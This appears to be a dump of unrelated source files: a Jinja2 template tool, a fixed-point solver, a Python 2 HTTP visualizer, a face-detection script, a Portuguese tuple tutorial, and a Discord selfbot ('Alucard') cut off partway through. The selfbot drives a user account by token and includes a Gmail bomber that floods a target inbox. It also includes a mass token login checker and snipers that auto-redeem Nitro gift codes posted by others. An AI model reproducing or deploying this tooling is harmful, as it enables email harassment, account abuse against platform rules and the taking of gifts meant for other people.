f3673f2d1e23e9414d5272cc47fcb027526cd67b | 2,123 | py | Python | tools/templatetool/templatetool.py | zfzackfrost/incredible_vulk | b5a6eb7072d5dc1d6e7a24d31379c1c6986f225c | [
"MIT"
] | null | null | null | tools/templatetool/templatetool.py | zfzackfrost/incredible_vulk | b5a6eb7072d5dc1d6e7a24d31379c1c6986f225c | [
"MIT"
] | null | null | null | tools/templatetool/templatetool.py | zfzackfrost/incredible_vulk | b5a6eb7072d5dc1d6e7a24d31379c1c6986f225c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Python script to process Jinja2 template
files and print to STDOUT.
"""
import argparse
import json
import sys
import os.path
from ttool import get_env
def process_args():
    """Parse and return the command line arguments for the template tool."""
    parser = argparse.ArgumentParser(
        prog="templatetool.py",
        description="Script to process Jinja2 template files and print them to STDOUT",
    )
    # Positional: the template file to render.
    parser.add_argument("input", type=str,
                        help="Specify the Jinja2 template file to process")
    # Optional output file; None means print the result to STDOUT.
    parser.add_argument("--output", "-o", type=str, default=None,
                        help="Specify the output file path")
    # Rendering context, supplied inline as a JSON object.
    parser.add_argument("--context", "-c", default="{}",
                        help="The Jinja2 context as JSON code.")
    # Repeatable flag: extra directories for the template search path.
    parser.add_argument("--include", "-I", action="append",
                        help="Add a directory to the template search path")
    return parser.parse_args()
def process_templates(template_path, include_paths, context):
    """Render *template_path* with *context*, searching *include_paths*."""
    environment = get_env(include_paths)
    template = environment.get_template(template_path)
    return template.render(context)
def main():
    """Main function: render the requested template and write or print it.

    Returns a process exit code: 0 on success, 1 on bad JSON context or a
    non-dictionary context root.
    """
    args = process_args()
    # Normalise the template path relative to the working directory.
    input_path = os.path.relpath(args.input.rstrip('/'), os.getcwd())
    try:
        context = json.loads(args.context)
    except json.JSONDecodeError as err:
        print(err.msg)
        return 1
    # NOTE(review): args.include is None when no -I flag was given, and
    # list(None) raises TypeError -- confirm whether that is intended.
    include_paths = list(args.include) + [os.path.dirname(input_path), os.getcwd()]
    include_paths = [os.path.normpath(os.path.abspath(p)) for p in include_paths]
    if not isinstance(context, dict):
        print("Context root must be a dictionary!")
        return 1
    result = process_templates(str(input_path), include_paths, context)
    output = args.output
    if output is not None:
        # Strip a trailing .jinja extension from the output name, create any
        # missing parent directories, and write the rendered text.
        if os.path.splitext(output)[1] == ".jinja":
            output = os.path.splitext(output)[0]
        os.makedirs(os.path.dirname(output), exist_ok=True)
        with open(output, 'w') as wfile:
            wfile.write(result)
    else:
        print(result)
    return 0


if __name__ == "__main__":
    sys.exit(main())
| 26.873418 | 87 | 0.63919 |
7f7c08b6e9c850f489e9427c7843eb05f5ec1f5d | 1,312 | py | Python | Python/fixedPoint.py | eechava6/NumericalAnalysisMethods | 3eeb06bdb20d97f13a09fd0ed71bce045173ffef | [
"MIT"
] | null | null | null | Python/fixedPoint.py | eechava6/NumericalAnalysisMethods | 3eeb06bdb20d97f13a09fd0ed71bce045173ffef | [
"MIT"
] | null | null | null | Python/fixedPoint.py | eechava6/NumericalAnalysisMethods | 3eeb06bdb20d97f13a09fd0ed71bce045173ffef | [
"MIT"
] | null | null | null | from function import f
from function import g
import numpy as np
import math
def fixedPoint(xi, tol, max_iter):
    """Fixed-point iteration x_{n+1} = g(x_n) starting from *xi*.

    Stops when f hits an exact root, when the step size drops below *tol*,
    or when *max_iter* iterations are exhausted.  Returns a dict holding
    the iteration table under "iters" and, when the loop terminates inside
    an iteration, a "status" message plus an "error" flag (True only when
    the iteration budget ran out).
    """
    result = {}
    f_value = f(xi)
    g_value = g(xi)

    # Row 0 records the starting point; no step error is defined yet.
    history = [{
        'iter': 0,
        'xi': xi,
        'g(xi)': g_value,
        'f(xi)': f_value,
        'error': 'NA',
    }]

    iteration = 1
    step = tol + 1  # guarantees at least one pass through the loop
    while step > tol and iteration <= max_iter:
        x_next = g_value
        g_value = g(x_next)
        f_value = f(x_next)
        step = abs(x_next - xi)
        xi = x_next
        history.append({
            'iter': iteration,
            'xi': xi,
            'g(xi)': g_value,
            'f(xi)': f_value,
            'error': step,
        })
        if f_value == 0:
            result["iters"] = history
            result["status"] = 'Root found! ;)'
            result["error"] = False
            return result
        elif step < tol:
            result["iters"] = history
            result["status"] = 'Err lower than tolerance! :)'
            result["error"] = False
            return result
        elif iteration >= max_iter:
            result["iters"] = history
            result["status"] = 'Overpassed max iteration! :('
            result["error"] = True
            return result
        iteration = iteration + 1
    return {"iters": history}
| 23.428571 | 58 | 0.4375 |
1e6aad6431ee5225e3fdfc6af90dd0b922869e9b | 4,403 | py | Python | Route_prediction/visualizer/HTTPServer.py | ashishpatel26/machine-learning-1 | 8ec46055582391d71de970ebcf173d0129ac2993 | [
"Apache-2.0"
] | 1 | 2018-06-29T13:35:56.000Z | 2018-06-29T13:35:56.000Z | Route_prediction/visualizer/HTTPServer.py | nav-e/machine-learning | 8ec46055582391d71de970ebcf173d0129ac2993 | [
"Apache-2.0"
] | null | null | null | Route_prediction/visualizer/HTTPServer.py | nav-e/machine-learning | 8ec46055582391d71de970ebcf173d0129ac2993 | [
"Apache-2.0"
] | 2 | 2017-11-26T00:42:48.000Z | 2021-07-09T04:29:14.000Z | #!/usr/bin/env python
import os
import sys
import urllib
import SimpleHTTPServer
import SocketServer
from cStringIO import StringIO
import data
from data.hdf5 import TaxiDataset
from visualizer import Vlist, Path
# Directory holding the data files served by the /ls and /get routes.
visualizer_path = os.path.join(data.path, 'visualizer')
# Directory containing this script's static assets (index.html etc.).
source_path = os.path.split(os.path.realpath(__file__))[0]

# Populated in __main__ unless --no-hdf5 is given.
test_data = None
train_data = None
class VisualizerHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """Python 2 HTTP handler routing /, /ls, /get/<path> and /extract/<query>."""

    def send_head(self):
        # Dispatch on the first path component, with any query string stripped.
        spath = self.path.split('?')[0]
        path = spath.split('/')[1:]
        if len(path) == 1:
            if path[0] == '':
                path[0] = 'index.html'
            file_path = os.path.join(source_path, path[0])
            return self.send_file(file_path)
        elif path[0] == 'ls':
            return self.send_datalist()
        elif path[0] == 'get':
            # spath[5:] drops the leading '/get/' prefix.
            return self.send_file(os.path.join(visualizer_path, spath[5:]))
        elif path[0] == 'extract':
            # spath[9:] drops the leading '/extract/' prefix.
            return self.send_extract(spath[9:])

    def send_file(self, file_path):
        # Serve a file from disk with content type, length and mtime headers.
        file_path = urllib.unquote(file_path)
        ctype = self.guess_type(file_path)
        try:
            f = open(file_path, 'rb')
        except IOError:
            self.send_error(404, 'File not found')
            return None
        try:
            self.send_response(200)
            self.send_header('Content-type', ctype)
            fs = os.fstat(f.fileno())
            self.send_header('Content-Length', str(fs[6]))
            self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
            self.end_headers()
            return f
        except:
            f.close()
            raise

    def send_datalist(self):
        # Walk visualizer_path and return a JSON array of
        # {"path": [...], "name": ..., "mtime": ...} records, sorted.
        l = []
        for path, subs, files in os.walk(visualizer_path):
            for file in files:
                mtime = os.stat('%s/%s' % (path, file))[8]
                l.append('{"path":["%s"],"name":"%s","mtime":%d}' % ('","'.join(path[len(visualizer_path):].split('/')), file, mtime))
        l.sort()
        f = StringIO()
        f.write("[")
        f.write(','.join(l))
        f.write("]")
        length = f.tell()
        f.seek(0)
        self.send_response(200)
        encoding = sys.getfilesystemencoding()
        self.send_header("Content-type", "text/html; charset=%s" % encoding)
        self.send_header("Content-Length", str(length))
        self.end_headers()
        return f

    def send_extract(self, query):
        # Query grammar: comma-separated items, each either an index or an
        # inclusive range "a-b"; a leading 't'/'T' selects the test dataset
        # instead of the training dataset.
        f = StringIO()
        query = urllib.unquote(query)
        content = Vlist()
        for (i,sub) in enumerate(query.split(',')):
            r = sub.split('-')
            if len(r)==1:
                if sub.strip()[0].lower()=='t':
                    sub=sub.strip()[1:]
                    content.append(Path(test_data.extract(int(sub)), 'T%s<br>'%sub))
                else:
                    content.append(Path(train_data.extract(int(sub)), '%s<br>'%sub))
            elif len(r)==2:
                test = False
                if r[0].strip()[0].lower()=='t':
                    test = True
                    r[0]=r[0].strip()[1:]
                if r[1].strip()[0].lower()=='t':
                    r[1]=r[1].strip()[1:]
                for i in xrange(int(r[0]), int(r[1])+1):
                    if test:
                        content.append(Path(test_data.extract(i), 'T%d<br>'%i))
                    else:
                        content.append(Path(train_data.extract(i), '%d<br>'%i))
            elif len(r)>2:
                # Malformed item such as "1-2-3".
                self.send_error(404, 'File not found')
                return None
        content.write(f)
        length = f.tell()
        f.seek(0)
        self.send_response(200)
        encoding = sys.getfilesystemencoding()
        self.send_header("Content-type", "text/html; charset=%s" % encoding)
        self.send_header("Content-Length", str(length))
        self.end_headers()
        return f
if __name__ == '__main__':
    # Usage: HTTPServer.py port [--no-hdf5]
    if len(sys.argv) < 2:
        # NOTE(review): prints usage but does not exit; sys.argv[1] below will
        # then raise IndexError -- presumably a sys.exit(1) is missing here.
        print >>sys.stderr, 'Usage: %s port [--no-hdf5]' % sys.argv[0]
    # Load the train/test datasets unless explicitly disabled.
    if '--no-hdf5' not in sys.argv:
        print >>sys.stderr, 'Loading dataset',
        # NOTE(review): `path` is computed but never used afterwards.
        path = os.path.join(data.path, 'data.hdf5')
        train_data = TaxiDataset('train')
        test_data = TaxiDataset('test')
        print >>sys.stderr, 'done'
    # Serve forever on the given port, on all interfaces.
    httpd = SocketServer.TCPServer(('', int(sys.argv[1])), VisualizerHTTPRequestHandler)
    httpd.serve_forever()
| 35.224 | 134 | 0.532137 |
c410f49d28ff597da06c1d25f9b1aa77ed622089 | 1,103 | py | Python | facedetection_vj.py | sgino209/FaceDetection_VJ_liveCam | ab68ecb26bf11704658e2fa6634e3daad516c155 | [
"Apache-2.0"
] | 1 | 2017-09-18T04:32:28.000Z | 2017-09-18T04:32:28.000Z | facedetection_vj.py | sgino209/FaceDetection_VJ_liveCam | ab68ecb26bf11704658e2fa6634e3daad516c155 | [
"Apache-2.0"
] | null | null | null | facedetection_vj.py | sgino209/FaceDetection_VJ_liveCam | ab68ecb26bf11704658e2fa6634e3daad516c155 | [
"Apache-2.0"
] | null | null | null | import cv2
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
cap = cv2.VideoCapture(0)
if not cap.isOpened():
print("Error")
exit(1)
fps = cap.get(cv2.CAP_PROP_FPS)
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
framesNum = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
while True:
ret, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
img = cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = img[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for (ex, ey, ew, eh) in eyes:
cv2.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0, 255, 0), 2)
img_scl = cv2.resize(img, None, fx=0.3, fy=0.3, interpolation=cv2.INTER_CUBIC)
cv2.imshow('img', img_scl)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
| 29.026316 | 82 | 0.644606 |
a52b7b97f81a1dca19bc123677e1c25965c83222 | 3,646 | py | Python | s07_colecoes/s07a02_tuplas.py | adeogliari/GeekUniversity_Python | 1b6badc45ca1dfbaa2f42196fb2dedac417b866e | [
"MIT"
] | null | null | null | s07_colecoes/s07a02_tuplas.py | adeogliari/GeekUniversity_Python | 1b6badc45ca1dfbaa2f42196fb2dedac417b866e | [
"MIT"
] | null | null | null | s07_colecoes/s07a02_tuplas.py | adeogliari/GeekUniversity_Python | 1b6badc45ca1dfbaa2f42196fb2dedac417b866e | [
"MIT"
] | null | null | null | """
Tuplas (tuple)
Tuplas são bastante parecidas com listas.
Existem basicamente duas diferenças:
1 - As tuplas são representadas por parênteses ()
2 - As tuplas são imutáveis: Isso significa que ao se criar uma tupla ela não
muda. Toda operação em uma tupla gera uma nova tupla
# CUIDADO 1: As tuplas são representadas por (), mas veja:
tupla1 = (1, 2, 3, 4, 5, 6)
print(tupla1)
print(type(tupla1))
tupla2 = 1, 2, 3, 4, 5, 6
print(tupla2)
print(type(tupla2))
# CUIDADO 2: Tuplas com 1 elemento
tupla3 = (4) # Isso não é uma tupla!
print(tupla3)
print(type(tupla3))
tupla4 = (4,) # Isso é uma tupla!
print(tupla4)
print(type(tupla4))
# CONCLUSÃO: As tuplas são definidas pela vírgula e não pelo uso do parênteses
tupla5 = 5, # Isso é uma tupla!
print(tupla5)
print(type(tupla5))
(4) -> Não é tupla
(4,) -> É tupla
4, -> É tupla
# Podemos gerar uma tupla dinamicamente com range (início,fim,passo)
tupla = tuple(range(11))
print(tupla)
print(type(tupla))
# Desempacotamento de tupla
tupla = ('Geek University', 'programação em Python: Essencial')
escola, curso = tupla
print(escola)
print(curso)
# Métodos para adição e remoção de elementos nas tuplas não existem, dado o fato das
tuplas serem imutáveis
# Soma*, Valor Máximo*, Valor Mínimo* e Tamanho
* Se os valores forem todos inteiros ou reais
tupla = (1, 2, 3, 4, 5, 6)
print(sum(tupla))
print(max(tupla))
print(min(tupla))
print(len(tupla))
# Concatenação de tuplas
tupla1 = (1, 2, 3)
print(tupla1)
tupla2 = (4, 5, 6)
print(tupla2)
print(tupla1 + tupla2) # todas são imutáveis
print(tupla1)
print(tupla2)
tupla3 = tupla1 + tupla2
print(tupla3)
tupla1 = tupla1 + tupla2 # Tuplas são imutáveis, mas podemos sobrescrever seus valores
print(tupla1)
# Verificar se determinado elemento está contido na tupla
tupla = (1, 2, 3)
print(3 in tupla)
# Iterando sobre uma tupla
tupla = (1, 2, 3)
for n in tupla:
print(n)
for indice, valor in enumerate(tupla):
print(indice, valor)
# Contando elementos dentro de uma tupla
tupla = ('a', 'b', 'c', 'd', 'e', 'a', 'b')
print(tupla.count('c'))
escola = tuple('Geek University')
print(escola)
print(escola.count('e'))
# Dicas na utilização de tuplas
- Devemos utilizar tuplas SEMPRE que não precisarmos modificar os dados contidos
em uma coleção
# Exemplo 1
meses = ('Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho',
'Agosto', 'Setembro', 'Outubro', 'Novembro', 'Dezembro')
# O acesso de elementos de uma tupla também é semelhante a de uma lista
print(meses[5])
# Iterar com while
i = 0
while i < len(meses):
print(meses[i])
i += 1
# Verificamos em qual índice um elemento está na tupla
print(meses.index('Dezembro'))
# Slicing: tupla[inicio:fim:passo]
meses = ('Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho',
'Agosto', 'Setembro', 'Outubro', 'Novembro', 'Dezembro')
print(meses[0::2])
# Por quê utilizar tuplas?
- Tuplas são mais rápidas do que listas.
- Tuplas deixam o código mais seguro*.
* Isso porque trabalhar com elementos imutáveis traz segurança para o código.
# Copiando uma tupla para outra
tupla = (1, 2, 3)
print(tupla)
nova = tupla # Na tupla não temos o problema de Shallow Copy
print(nova)
print(tupla)
outra = (4, 5, 6)
nova = nova + outra
print(nova)
print(tupla)
"""
| 22.09697 | 90 | 0.630005 |
4cd2bfa749d2f3073ed9f0d6b5cc354c984b044a | 69,994 | py | Python | Alucard-Selfbot-src-master/Main.py | navisx/saiph | dabd68c633ee8d0758882f0c80c91734040c8bb4 | [
"MIT"
] | null | null | null | Alucard-Selfbot-src-master/Main.py | navisx/saiph | dabd68c633ee8d0758882f0c80c91734040c8bb4 | [
"MIT"
] | null | null | null | Alucard-Selfbot-src-master/Main.py | navisx/saiph | dabd68c633ee8d0758882f0c80c91734040c8bb4 | [
"MIT"
] | null | null | null | class SELFBOT():
__linecount__ = 1933
__version__ = 3.4
# Dont just skid it, gimme some credits, thank you - coats.#1234
import discord, subprocess, sys, time, os, colorama, base64, codecs, datetime, io, random, numpy, datetime, smtplib, string, ctypes
import urllib.parse, urllib.request, re, json, requests, webbrowser, aiohttp, dns.name, asyncio, functools, logging
from discord.ext import (
commands,
tasks
)
from bs4 import BeautifulSoup as bs4
from urllib.parse import urlencode
from pymongo import MongoClient
from selenium import webdriver
from threading import Thread
from subprocess import call
from itertools import cycle
from colorama import Fore
from sys import platform
from PIL import Image
import pyPrivnote as pn
from gtts import gTTS
ctypes.windll.kernel32.SetConsoleTitleW(f'[Alucard Selfbot v{SELFBOT.__version__}] | Loading...')
with open('config.json') as f:
config = json.load(f)
token = config.get('token')
password = config.get('password')
prefix = config.get('prefix')
giveaway_sniper = config.get('giveaway_sniper')
slotbot_sniper = config.get('slotbot_sniper')
nitro_sniper = config.get('nitro_sniper')
privnote_sniper = config.get('privnote_sniper')
stream_url = config.get('stream_url')
tts_language = config.get('tts_language')
bitly_key = config.get('bitly_key')
cat_key = config.get('cat_key')
weather_key = config.get('weather_key')
cuttly_key = config.get('cuttly_key')
width = os.get_terminal_size().columns
hwid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
start_time = datetime.datetime.utcnow()
loop = asyncio.get_event_loop()
languages = {
'hu' : 'Hungarian, Hungary',
'nl' : 'Dutch, Netherlands',
'no' : 'Norwegian, Norway',
'pl' : 'Polish, Poland',
'pt-BR' : 'Portuguese, Brazilian, Brazil',
'ro' : 'Romanian, Romania',
'fi' : 'Finnish, Finland',
'sv-SE' : 'Swedish, Sweden',
'vi' : 'Vietnamese, Vietnam',
'tr' : 'Turkish, Turkey',
'cs' : 'Czech, Czechia, Czech Republic',
'el' : 'Greek, Greece',
'bg' : 'Bulgarian, Bulgaria',
'ru' : 'Russian, Russia',
'uk' : 'Ukranian, Ukraine',
'th' : 'Thai, Thailand',
'zh-CN' : 'Chinese, China',
'ja' : 'Japanese',
'zh-TW' : 'Chinese, Taiwan',
'ko' : 'Korean, Korea'
}
locales = [
"da", "de",
"en-GB", "en-US",
"es-ES", "fr",
"hr", "it",
"lt", "hu",
"nl", "no",
"pl", "pt-BR",
"ro", "fi",
"sv-SE", "vi",
"tr", "cs",
"el", "bg",
"ru", "uk",
"th", "zh-CN",
"ja", "zh-TW",
"ko"
]
m_numbers = [
":one:",
":two:",
":three:",
":four:",
":five:",
":six:"
]
m_offets = [
(-1, -1),
(0, -1),
(1, -1),
(-1, 0),
(1, 0),
(-1, 1),
(0, 1),
(1, 1)
]
    def startprint():
        """Print the startup banner with sniper states, login info and prefix."""
        # Map each sniper toggle to a display string.
        if giveaway_sniper == True:
            giveaway = "Active"
        else:
            giveaway = "Disabled"
        if nitro_sniper == True:
            nitro = "Active"
        else:
            nitro = "Disabled"
        if slotbot_sniper == True:
            slotbot = "Active"
        else:
            slotbot = "Disabled"
        if privnote_sniper == True:
            privnote = "Active"
        else:
            privnote = "Disabled"
        # Banner art + status lines (colorama colour codes interpolated).
        print(f'''{Fore.RESET}
    ▄▄▄       ██▓     █    ██  ▄████▄   ▄▄▄       ██▀███  ▓█████▄
    ▒████▄    ▓██▒     ██  ▓██▒▒██▀ ▀█  ▒████▄    ▓██ ▒ ██▒▒██▀ ██▌
    ▒██  ▀█▄  ▒██░    ▓██  ▒██░▒▓█    ▄ ▒██  ▀█▄  ▓██ ░▄█ ▒░██   █▌
    ░██▄▄▄▄██ ▒██░    ▓▓█  ░██░▒▓▓▄ ▄██▒░██▄▄▄▄██ ▒██▀▀█▄  ░▓█▄   ▌
    ▓█   ▓██▒░██████▒▒▒█████▓ ▒ ▓███▀ ░ ▓█   ▓██▒░██▓ ▒██▒░▒████▓
    ▒▒   ▓▒█░░ ▒░▓  ░░▒▓▒ ▒ ▒ ░ ░▒ ▒  ░ ▒▒   ▓▒█░░ ▒▓ ░▒▓░ ▒▒▓  ▒
    ▒   ▒▒ ░░ ░ ▒  ░░░▒░ ░ ░   ░  ▒     ▒   ▒▒ ░  ░▒ ░ ▒░ ░ ▒  ▒
    ░   ▒     ░ ░    ░░░ ░ ░ ░          ░   ▒     ░░   ░  ░ ░  ░
        ░  ░    ░  ░   ░     ░ ░            ░  ░   ░        ░
    {Fore.CYAN}Alucard {SELFBOT.__version__} | {Fore.GREEN}Logged in as: {Alucard.user.name}#{Alucard.user.discriminator} {Fore.CYAN}| ID: {Fore.GREEN}{Alucard.user.id}
    {Fore.CYAN}Privnote Sniper | {Fore.GREEN}{privnote}
    {Fore.CYAN}Nitro Sniper | {Fore.GREEN}{nitro}
    {Fore.CYAN}Giveaway Sniper | {Fore.GREEN}{giveaway}
    {Fore.CYAN}SlotBot Sniper | {Fore.GREEN}{slotbot}
    {Fore.CYAN}Prefix: {Fore.GREEN}{prefix}
    {Fore.CYAN}Creator(open-source on github): {Fore.GREEN}coats.#1234
    '''+Fore.RESET)
    def Clear():
        """Clear the Windows console window."""
        os.system('cls')
    # Clear once at startup, before the banner is printed.
    Clear()
    def Init():
        """Validate the configured token and start the Discord client.

        Prints an error if the config still holds the placeholder token or if
        Discord rejects the token (LoginFailure).
        """
        if config.get('token') == "token-here":
            Clear()
            print(f"{Fore.RED}[ERROR] {Fore.YELLOW}You didnt put your token in the config.json file"+Fore.RESET)
        else:
            token = config.get('token')
            try:
                # bot=False => log in as a user account (selfbot).
                Alucard.run(token, bot=False, reconnect=True)
                os.system(f'title (Alucard Selfbot) - Version {SELFBOT.__version__}')
            except discord.errors.LoginFailure:
                print(f"{Fore.RED}[ERROR] {Fore.YELLOW}Improper token has been passed"+Fore.RESET)
                os.system('pause >NUL')
def GmailBomber():
_smpt = smtplib.SMTP('smtp.gmail.com', 587)
_smpt.starttls()
username = input('Gmail: ')
password = input('Gmail Password: ')
try:
_smpt.login(username, password)
except:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW} Incorrect Password or gmail, make sure you've enabled less-secure apps access"+Fore.RESET)
target = input('Target Gmail: ')
message = input('Message to send: ')
counter = eval(input('Ammount of times: '))
count = 0
while count < counter:
count = 0
_smpt.sendmail(username, target, message)
count += 1
if count == counter:
pass
def GenAddress(addy: str):
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
four_char = ''.join(random.choice(letters) for _ in range(4))
should_abbreviate = random.randint(0,1)
if should_abbreviate == 0:
if "street" in addy.lower():
addy = addy.replace("Street", "St.")
addy = addy.replace("street", "St.")
elif "st." in addy.lower():
addy = addy.replace("st.", "Street")
addy = addy.replace("St.", "Street")
if "court" in addy.lower():
addy = addy.replace("court", "Ct.")
addy = addy.replace("Court", "Ct.")
elif "ct." in addy.lower():
addy = addy.replace("ct.", "Court")
addy = addy.replace("Ct.", "Court")
if "rd." in addy.lower():
addy = addy.replace("rd.", "Road")
addy = addy.replace("Rd.", "Road")
elif "road" in addy.lower():
addy = addy.replace("road", "Rd.")
addy = addy.replace("Road", "Rd.")
if "dr." in addy.lower():
addy = addy.replace("dr.", "Drive")
addy = addy.replace("Dr.", "Drive")
elif "drive" in addy.lower():
addy = addy.replace("drive", "Dr.")
addy = addy.replace("Drive", "Dr.")
if "ln." in addy.lower():
addy = addy.replace("ln.", "Lane")
addy = addy.replace("Ln.", "Lane")
elif "lane" in addy.lower():
addy = addy.replace("lane", "Ln.")
addy = addy.replace("lane", "Ln.")
random_number = random.randint(1,99)
extra_list = ["Apartment", "Unit", "Room"]
random_extra = random.choice(extra_list)
return four_char + " " + addy + " " + random_extra + " " + str(random_number)
def BotTokens():
with open('Data/Tokens/bot-tokens.txt', 'a+') as f:
tokens = {token.strip() for token in f if token}
for token in tokens:
yield token
def UserTokens():
with open('Data/Tokens/user-tokens.txt', 'a+') as f:
tokens = {token.strip() for token in f if token}
for token in tokens:
yield token
    class Login(discord.Client):
        """Throwaway Discord client used by _masslogin: connect, print account
        stats and the token, then immediately log out."""
        async def on_connect(self):
            guilds = len(self.guilds)
            users = len(self.users)
            print("")
            print(f"Connected to: [{self.user.name}]")
            print(f"Token: {self.http.token}")
            print(f"Guilds: {guilds}")
            print(f"Users: {users}")
            print("-------------------------------")
            # One-shot check: disconnect as soon as the stats are printed.
            await self.logout()
def _masslogin(choice):
if choice == 'user':
for token in UserTokens():
loop.run_until_complete(Login().start(token, bot=False))
elif choice == 'bot':
for token in BotTokens():
loop.run_until_complete(Login().start(token, bot=True))
else:
return
def async_executor():
def outer(func):
@functools.wraps(func)
def inner(*args, **kwargs):
thing = functools.partial(func, *args, **kwargs)
return loop.run_in_executor(None, thing)
return inner
return outer
    @async_executor()
    def do_tts(message):
        """Render `message` to speech with gTTS (configured tts_language) and
        return an in-memory MP3 buffer rewound to the start.

        Runs on the executor (blocking network call inside gTTS).
        """
        f = io.BytesIO()
        tts = gTTS(text=message.lower(), lang=tts_language)
        tts.write_to_fp(f)
        f.seek(0)
        return f
def Dump(ctx):
for member in ctx.guild.members:
f = open(f'Images/{ctx.guild.id}-Dump.txt', 'a+')
f.write(str(member.avatar_url)+'\n')
def Nitro():
code = ''.join(random.choices(string.ascii_letters + string.digits, k=16))
return f'https://discord.gift/{code}'
def RandomColor():
randcolor = discord.Color(random.randint(0x000000, 0xFFFFFF))
return randcolor
def RandString():
return "".join(random.choice(string.ascii_letters + string.digits) for i in range(random.randint(14, 32)))
colorama.init()
Alucard = discord.Client()
Alucard = commands.Bot(
description='Alucard Selfbot',
command_prefix=prefix,
self_bot=True
)
Alucard.remove_command('help')
    @tasks.loop(seconds=3)
    async def btc_status():
        """Background task: show the live BTC/USD price as a streaming status.

        NOTE(review): requests.get here is a blocking call inside a coroutine,
        and the extra sleep(3) doubles the loop interval -- presumably
        unintentional; confirm before changing.
        """
        r = requests.get('https://api.coindesk.com/v1/bpi/currentprice/btc.json').json()
        value = r['bpi']['USD']['rate']
        await asyncio.sleep(3)
        btc_stream = discord.Streaming(
            name="Current BTC price: "+value+"$ USD",
            url="https://www.twitch.tv/monstercat",
        )
        await Alucard.change_presence(activity=btc_stream)
    @Alucard.event
    async def on_command_error(ctx, error):
        """Global command error handler: print a coloured console message per
        error category; unknown commands are silently ignored."""
        error_str = str(error)
        # Unwrap CommandInvokeError to the underlying exception if present.
        error = getattr(error, 'original', error)
        if isinstance(error, commands.CommandNotFound):
            return
        elif isinstance(error, commands.CheckFailure):
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}You're missing permission to execute this command"+Fore.RESET)
        elif isinstance(error, commands.MissingRequiredArgument):
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Missing arguments: {error}"+Fore.RESET)
        elif isinstance(error, numpy.AxisError):
            # Raised by image commands when numpy gets a non-image array.
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Not a valid image"+Fore.RESET)
        elif isinstance(error, discord.errors.Forbidden):
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Discord error: {error}"+Fore.RESET)
        elif "Cannot send an empty message" in error_str:
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Couldnt send a empty message"+Fore.RESET)
        else:
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{error_str}"+Fore.RESET)
    @Alucard.event
    async def on_message_edit(before, after):
        """Re-run command processing on edited messages, so a typo'd command can
        be fixed by editing it."""
        await Alucard.process_commands(after)
    @Alucard.event
    async def on_message(message):
        """Inspect every incoming message for sniper triggers (nitro gifts,
        SlotBot drops, GiveawayBot giveaways, privnote links), then forward the
        message to command processing."""
        def GiveawayData():
            print(
                f"{Fore.WHITE} - CHANNEL: {Fore.YELLOW}[{message.channel}]"
                f"\n{Fore.WHITE} - SERVER: {Fore.YELLOW}[{message.guild}]"
            +Fore.RESET)
        def SlotBotData():
            print(
                f"{Fore.WHITE} - CHANNEL: {Fore.YELLOW}[{message.channel}]"
                f"\n{Fore.WHITE} - SERVER: {Fore.YELLOW}[{message.guild}]"
            +Fore.RESET)
        def NitroData(elapsed, code):
            print(
                f"{Fore.WHITE} - CHANNEL: {Fore.YELLOW}[{message.channel}]"
                f"\n{Fore.WHITE} - SERVER: {Fore.YELLOW}[{message.guild}]"
                f"\n{Fore.WHITE} - AUTHOR: {Fore.YELLOW}[{message.author}]"
                f"\n{Fore.WHITE} - ELAPSED: {Fore.YELLOW}[{elapsed}]"
                f"\n{Fore.WHITE} - CODE: {Fore.YELLOW}{code}"
            +Fore.RESET)
        def PrivnoteData(code):
            print(
                f"{Fore.WHITE} - CHANNEL: {Fore.YELLOW}[{message.channel}]"
                f"\n{Fore.WHITE} - SERVER: {Fore.YELLOW}[{message.guild}]"
                f"\n{Fore.WHITE} - CONTENT: {Fore.YELLOW}[The content can be found at Privnote/{code}.txt]"
            +Fore.RESET)
        # Timestamp used in all console log lines (shadows the imported `time`).
        time = datetime.datetime.now().strftime("%H:%M %p")
        # --- Nitro sniper: try to redeem any gift code instantly. ---
        if 'discord.gift/' in message.content:
            if nitro_sniper == True:
                start = datetime.datetime.now()
                code = re.search("discord.gift/(.*)", message.content).group(1)
                token = config.get('token')
                headers = {'Authorization': token}
                # Blocking POST to the redeem endpoint (speed over async here).
                r = requests.post(
                    f'https://discordapp.com/api/v6/entitlements/gift-codes/{code}/redeem',
                    headers=headers,
                ).text
                elapsed = datetime.datetime.now() - start
                elapsed = f'{elapsed.seconds}.{elapsed.microseconds}'
                if 'This gift has been redeemed already.' in r:
                    print(""
                    f"\n{Fore.CYAN}[{time} - Nitro Already Redeemed]"+Fore.RESET)
                    NitroData(elapsed, code)
                elif 'subscription_plan' in r:
                    print(""
                    f"\n{Fore.CYAN}[{time} - Nitro Success]"+Fore.RESET)
                    NitroData(elapsed, code)
                elif 'Unknown Gift Code' in r:
                    print(""
                    f"\n{Fore.CYAN}[{time} - Nitro Unknown Gift Code]"+Fore.RESET)
                    NitroData(elapsed, code)
            else:
                return
        # --- SlotBot sniper: grab drops announced by the SlotBot bot id. ---
